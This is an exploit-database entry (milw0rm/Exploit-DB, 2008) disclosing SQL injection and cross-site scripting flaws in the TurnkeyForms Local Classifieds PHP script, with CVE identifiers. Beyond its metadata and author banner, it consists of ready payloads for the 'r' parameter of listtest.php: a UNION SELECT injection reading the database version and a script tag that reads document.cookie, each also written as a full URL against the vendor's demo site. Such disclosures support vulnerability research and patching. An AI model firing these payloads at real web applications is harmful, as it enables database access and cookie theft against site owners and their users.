EXPLOITS

TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection

Author: TR-ShaRk
type: webapps
platform: php
port: 
date_added: 2008-11-06  
date_updated:   
verified: 1  
codes: OSVDB-52313;CVE-2008-6351;OSVDB-49754;CVE-2008-6350  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7035.txt  

##################################################################
#
#   Author: TR-ShaRk
#
######################
#
#   Web   : StarHack.Us OldKral.Com
#
######################
#
#   Emai   : Admin@tr-shark.org
#
######################
#
#   Script : Local Classifieds Turnkeyforms
#
######################
#
#   SQL Injection Vuln. :
#
#   listtest.php?r=-39+union+select+1,@@version--
#
#   Xss:
#
#   listtest.php?r="><script>alert(document.cookie)</script>
#
######################
#
#   Demo:
#
#
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="><script>alert(document.cookie)</script>
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
#
######################

# milw0rm.com [2008-11-07]